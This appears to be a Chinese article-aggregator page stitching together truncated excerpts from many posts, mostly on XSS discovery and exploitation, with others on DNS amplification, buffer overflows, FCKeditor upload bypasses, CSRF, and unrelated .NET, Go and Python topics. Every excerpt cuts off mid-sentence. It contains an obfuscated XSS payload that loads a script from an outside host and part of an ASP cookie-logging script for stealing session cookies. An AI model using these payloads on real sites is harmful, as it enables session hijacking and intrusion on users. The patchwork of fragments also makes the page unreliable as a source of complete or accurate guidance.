记一次电信反射xss的挖掘与利用】的更多相关文章

0X0.前言 早上起床,打开手机习惯性刷刷新闻,却发现网络无法连接,本以为是光猫出现了问题,后来发现是忘记续费,欠费了. 在网上充值完之后,等了有将近十分钟,网依旧没恢复.随打了个电话给客服,客服在后台帮忙刷新了一下数据,一分钟后网络就恢复了. 在我打了个非常满意评价后,客服发了个短信给我,短信内容是这样子的. 点开链接,页面跳转一下,发现是一个客户自检网络,修复网络故障的页面.(上网账号和城市做了修改) 心想这里会不会有点什么呢? 搞事心态一起,那么就研究研究吧. 0x1.反射XSS的挖掘 抽…
前言 在为某客户网站做渗透测试时发现一个有趣的事情.当我访问该网站的某条链接时服务器返回的是404页面.看到这里我当时就下意识的忽略它,但是后来又想了想这也不是完全没有价值,毕竟中间件及其版本都出来了.于是上web神奇AWVS,大概扫了半小时终于有发现. AWVS结果显示在sys_variable_name字段存在一个xss跨站脚本攻击漏洞. 但是不知道从何下手,于是接着查看HTTP request包,发现下方有一行提交的参数 正是这段参数: flow_type=twvideo&funcNo=5…
xss漏洞挖掘小结 最近,在挖掘xss的漏洞,感觉xss真的不是想象的那样简单,难怪会成为一类漏洞,我们从防的角度来讲讲xss漏洞的挖掘方法: 1.过滤 一般服务器端都是采用这种方式来防御xss攻击,服务器会过滤掉一些能构成事件.js代码的关键字,如:on….< .>.script.img.svg… 一般不会过滤alert 2.编码 一般编码:<.>./.’.” 这些关键字 3.扰乱 一般扰乱:s<x>cript.on<x>error xss挖掘思路 第一层…
from http://www.cnblogs.com/hookjoy/p/3503786.html 一次有趣的XSS漏洞挖掘分析(1)   最近认识了个新朋友,天天找我搞XSS.搞了三天,感觉这一套程序还是很有意思的.因为是过去式的文章,所以没有图.但是希望把经验分享出来,可以帮到和我一样爱好XSS的朋友.我个人偏爱富文本XSS,因为很有趣.有趣的地方是你需要一点一点的测试都过滤了些什么,怎么过滤的.我想,这也是黑盒测试最让人着迷的地方吧    首先,锁定了提交问题的模块,因为这块有编辑器.然…
XSS漏洞的渗透利用另类玩法 2017-08-08 18:20程序设计/微软/手机 作者:色豹 i春秋社区 今天就来讲一下大家都熟悉的 xss漏洞的渗透利用.相信大家对xss已经很熟悉了,但是很多安全人员的意识里 xss漏洞危害只有弹窗或者窃取cookie.但是xss还有更多的花式玩法,今天将介绍几种. 1. xss渗透添加管理员 后台触发存储型XSS,网站设置http-only,窃取的cookie无效.那么如何在这种情况下利用xss漏洞. 无法获取cookie,但是我们可以利用xss漏洞,以管…
[.net 面向对象程序设计进阶] (20) 反射(Reflection)(上)利用反射技术实现动态编程 本节导读:本节主要介绍什么是.NET反射特性,.NET反射能为我们做些什么,最后介绍几种常用的反射的实现方法,通过对反射性特的了解,可以设计出非常有用的基于反射的编程模式. 读前必备: [.net 面向对象编程基础]  (10) 类的成员(字段.属性.方法) 1.什么是.NET反射? 反射是.NET一个重要的特性,<CLR via C#>一书中对.NET反射的解释为:在我们应用程序中使用元…
DNS反射放大攻击分析 摘自:http://www.shaojike.com/2016/08/19/DNS%E6%94%BE%E5%A4%A7%E6%94%BB%E5%87%BB%E7%AE%80%E5%8D%95%E5%88%86%E6%9E%90/ 简介 DNS反射放大攻击主要是利用DNS回复包比请求包大的特点,放大流量,伪造请求包的源IP地址为受害者IP,将应答包的流量引入受害的服务器. 简单对比下正常的DNS查询和攻击者的攻击方式: 正常DNS查询:源IP地址 —–DNS查询—-> DN…
博客园在整改中,无法更新文章,难受啊... 记录一次react的xss漏洞发现,比较有意思: 某个站: 直接输入<xxx>,直接把我跳转到了404,猜测可能做了一些验证: 尝试多重编码,发现都被转义.网页上也没地方执行了图片 后来尝试html实体义: <img/src=1>- 直接请求,也被跳转到了404,进行了二次url编码,发现<img/src=1>-掉落在网页源码中可见,并且解析执行了 查看源码很奇怪,奇怪点就是因为14个输出的地方全部对<>这些进行了…
挖掘过程一: 自从上一次投稿,已经好久好久没写文章了.今天就着吃饭的时间,写篇文章,记录下自己学习xss这么久的心得.在我看来.Xss就是javascript注入,你可以在js语法规定的范畴内做任何事情,js可谓强大,本次结合一次挖掘xss的过程和xss的综合利用来探讨,小菜一枚,希望大牛不吝赐教.文章里的网站打码,大家见谅 我们先看看网站 测试储存型xss的话,黑盒测试效果还可以.我们这里不讨论反射型的,反射型的,基本一些扫描工具就可以秒了.当然我们要在我们能看见的任何地方开始狂插,<scri…
第一次和一套程序做了这么多次的斗争.今天基友又给我来信说,没得玩了.了解了下情况,是他拿着0day到处插,被人家发现了.还出了个公告,说所有***必须安装补丁.呵呵,性福总是走的这么突然.这乐子一下就让人给搞没了.本来想的就算了.但是突然觉得还是想看看程序员是怎么修复的.(说实话,搞了那么多天也有感情了不是) <p onmouseover="\u0064ocument.write('<sc'+'ript src=//zsy.ca/33></sc'+'ript>')&…
最近认识了个新朋友,天天找我搞XSS.搞了三天,感觉这一套程序还是很有意思的.因为是过去式的文章,所以没有图.但是希望把经验分享出来,可以帮到和我一样爱好XSS的朋友.我个人偏爱富文本XSS,因为很有趣.有趣的地方是你需要一点一点的测试都过滤了些什么,怎么过滤的.我想,这也是黑盒测试最让人着迷的地方吧    首先,锁定了提交问题的模块,因为这块有编辑器.然后开始fuzz filter规则.一共有两个输入点:标题,内容  我一般喜欢从内容入手,因为这块没有长度限制.一开始先一个一个测试一些可以用来…
虽然大数据量的环境下,通过反射转换DataRow为对象性能会很低,但是在数据量适中的时候,这样能够减少很多的代码量,性能也确实不错. 所以在数据量不是很大的情况下,推荐使用. 如果数据量很大,可以使用Emit来提高性能,最近也在研究它,网上也有很多这方面的资料. 我定义了一个DataRow的扩张方法,如下: using System; using System.Data; using System.Reflection; namespace YCG.FCL.Common.ExtensionMet…
2018/3/26 ,共计310G左右的DDoS攻击 临时解决办法:将web服务转移到同生产一个内网段的备份服务器a上,a提供web端口80,数据库通过内网连接还是沿用生产数据库. 后续解决办法:通过跳板登录生产服务器,通过抓包可看出是NTP反射放大攻击,直接关闭ntp服务,如果需要用到ntp服务,之后再在安全组和防火墙设置屏蔽规则,拦截目的或者源端口为相应服务端口(123)的所有UDP报文,再开放自己信任IP即可.如下设置防火墙屏蔽规则: -A INPUT -p udp -m udp --sp…
  第一次和一套程序做了这么多次的斗争.今天基友又给我来信说,没得玩了.了解了下情况,是他拿着0day到处插,被人家发现了.还出了个公告,说所有***必须安装补丁.呵呵,性福总是走的这么突然.这乐子一下就让人给搞没了.本来想的就算了.但是突然觉得还是想看看程序员是怎么修复的.(说实话,搞了那么多天也有感情了不是) <p onmouseover="\u0064ocument.write('<sc'+'ript src=//zsy.ca/33></sc'+'ript>'…
这真是最后一次了.真的再不逗这个程序员了.和预期一样,勤奋的程序员今天又更新程序了.因为前面写的payload都有一个致命的弱点,就是document.write()会完全破坏DOM结构.而且再“完事儿”之后,还不会跳转到本应该跳转的页面.所以还是那么容易就被发现了.(也包括我犯贱老找别人网站做测试)反思 昨天在去便利店买烟的时候,发现了自己犯的一个错误.就当是纠正一下前面的2篇吧.当我们的JS是在script标签内的时候,像这样: )</script> 我们是需要规规矩矩的写上这个docum…
  这真是最后一次了.真的再不逗这个程序员了.和预期一样,勤奋的程序员今天又更新程序了.因为前面写的payload都有一个致命的弱点,就是document.write()会完全破坏DOM结构.而且再“完事儿”之后,还不会跳转到本应该跳转的页面.所以还是那么容易就被发现了.(也包括我犯贱老找别人网站做测试)反思 昨天在去便利店买烟的时候,发现了自己犯的一个错误.就当是纠正一下前面的2篇吧.当我们的JS是在script标签内的时候,像这样: <script>document.write(123)&…
异常处理 什么是异常? 异常即是一个事件,该事件会在程序执行过程中发生,影响了程序的正常执行. 一般情况下,在Python无法正常处理程序时就会发生一个异常.异常是Python对象,表示一个错误.当Python脚本发生异常时我们需要捕获处理它,否则程序会终止执行. 方式一.  使用try/except语句. try/except语句用来检测try语句块中的错误,从而让except语句捕获异常信息并处理. 如果你不想在异常发生时结束你的程序,只需在try里捕获它. 语法: 以下为简单的try...…
(一)软件测试环境以及搭建 测试环境:本地 XAMPP 1.7.1 测试软件:PHP168整站v5.0 软件下载地址 http://down2.php168.com/v2008.rar PHP.ini 配置: magic_quotes_gpc Off(On或者Off对持久型XSS并无没影响) ;register_globals Off ;safe_mode Off ; (二)XSS跨站基础 1.XSS攻击定义 XSS又叫CSS (Cross Site Script) ,简称跨站脚本攻击.它指的是…
缓冲区溢出攻击很容易被攻击者利用,因为 C 和 C++等语言并没有自动检测缓冲区溢出操作,同时程序编写人员在编写代码时也很难始终检查缓冲区是否可能溢出.利用溢出,攻击者可以将期望数据写入漏洞程序内存中的任意位置,甚至包括控制程序执行流的关键数据(比如函数调用后的返回地址),从而控制程序的执行过程并实施恶意行为. 缓冲区溢出的常用攻击方法是将恶意代码 shellcode 注入到程序中,并用其地址来覆盖程序本身函数调用的返回地址,使得返回时执行此恶意代码而不是原本应该执行的代码.也就是说,这种攻击在…
获取cookie利用代码cookie.asp <html> <title>xx</title> <body> <%testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中 msg = Request("msg") //获取提交过来的msg变量,也就是cookie值 set fs = ser…
转载自FreeBuf.COM XSS是一种非常常见的漏洞类型,它的影响非常的广泛并且很容易的就能被检测到. 攻击者可以在未经验证的情况下,将不受信任的JavaScript片段插入到你的应用程序中,然后这个JavaScript将被访问目标站点的受害者执行[阅读更多]. 跨站点“Scripter”(又名XSSer)是一个自动化框架,用于检测.利用以及报告基于Web应用程序中的XSS漏洞. 它包含多个尝试绕过某些过滤器的选项,以及各种特殊的代码注入技术. 安装XSSer – XSS XSSer支持多平…
标准库内部如何实现接口的 package main import ( "fmt" "io" "net/http" "os" ) func init() { if len(os.Args) != 2 { fmt.Println("Usage:./example2 <url>") os.Exit(-1) } } func main() { r, err := http.Get(os.Args[1])…
前言 大学英语会用到一个 ActiveX 插件 LearnX ,最近从网上下了一个下来分析了一下,找到了一些漏洞并完成了 exploit . 虽然涉及的知识比较老旧,不过还是挺有意思的.这里分享一下整个过程. 相关文件 链接: https://pan.baidu.com/s/1jfDIInXD4k1nGOeCghEGDg 提取码: dmm6 解压密码:9179ee68791ae58187eb30837370aae4 正文 分析准备 首先在网上下载了一个安装程序,下载并安装到电脑上. https:…
查看编辑器版本号 FCKeditor/_whatsnew.html ------------------------------------------------------------- 2. Version 2.2 版本号 Apache+linux 环境下在上传文件后面加个.突破!測试通过. ------------------------------------------------------------- 3.Version <=2.4.2 For php 在处理PHP 上传的地方…
0x01 CSRF的攻击原理 CSRF 百度上的意思是跨站请求伪造,其实最简单的理解我们可以这么讲,假如一个微博关注用户的一个功能,存在CSRF漏洞,那么此时黑客只需要伪造一个页面让受害者间接或者直接触发,然后这个恶意页面就可以使用受害者的微博权限去关注其他的人微博账户.CSRF只要被批量化利用起来其危害还是比较大的. 举个例子,比如笔者在新浪首页执行了一次搜索请求. 可以看到这里有个Referer的信息,Referer也就是请求来源地址,也就是说这个请求是从http://www.sina.co…
3.Web安全基础 3.1.HTTP协议 1)TCP/IP协议-HTTP 应用层:HTTP.FTP.TELNET.DNS.POP3 传输层:TCP.UDP 网络层:IP.ICMP.ARP 2)常用方法-Method GET:向特定的资源发出请求 POST:向指定资源提交数据进行处理请求(例如提交表单或者上传文件).数据被包含在请求体中.POST请求可能会导致新的资源的建立和/或已有资源的修改. HEAD:向服务器索与GET请求相一致的响应,只不过响应体将不会被返回.这一方法可以在不必传输整个响应…
0×01 前言: 关于前两节url: 第一章:http://www.freebuf.com/articles/web/40520.html 第二章:http://www.freebuf.com/articles/web/42727.html 说的xss的原理及不同环境的构造方法.和XSS的分类及挖掘方法.那么本期则说XSS技巧,前面两个干货不太多,讲的都是比较基础的.而这期则是满满的干货. 从本期开始,XSS我就开始深入了.至 于下一章XSS编码,已经被0xExploit写过了( http://…
‍‍0×01 前言: 关于前两节url: 第一章:http://www.freebuf.com/articles/web/40520.html 第二章:http://www.freebuf.com/articles/web/42727.html 说的xss的原理及不同环境的构造方法.和XSS的分类及挖掘方法.那么本期则说XSS技巧,前面两个干货不太多,讲的都是比较基础的.而这期则是满满的干货. 从本期开始,XSS我就开始深入了.至 于下一章XSS编码,已经被0xExploit写过了( http:…
0×01 第三方劫持 (外调J/C): 本方法是我看长短短贴代码时知晓的,这篇文章我只是把这个攻击手法整理了出来,来说明这个漏洞,这个攻击手法并不是我发现的,我也不是太清楚是谁.“第三方劫持”就是把资源域的服务器的权限拿下,替换相关资源,采用‘迂回式’的渗透方式. PS:J/C指的是javascript.css,其实还包括flash.etc.html等等,只是这个不经常使用而已,所以就不说了. 从字面上大家也可以猜出来,这是种什么攻击手法.名字里的"外调"不是从目标网站上插入新的J/C…
时隔半年终于也应该更新了,之前说的每周更新也因为懒散这个借口变得遥遥无期.之所以叫这个标题,是在Freebuf上看到一篇文章,开头作者问到:“网上大多的文章标题都是XXX从0开始,可我们到底什么时候能从1开始呢?”所以我决定写一些关于XSS的东西,具体能坚持多少,我也不知道. 正文:XSS——实际指CSS(Cross Site Scripting),为了区别与层叠样式表将C写为X.一般我们将XSS称之为,跨站脚本攻击.之前我写的文章中提到过,凡是利用提交恶意代码的攻击都可以称之为注入,所以实际上…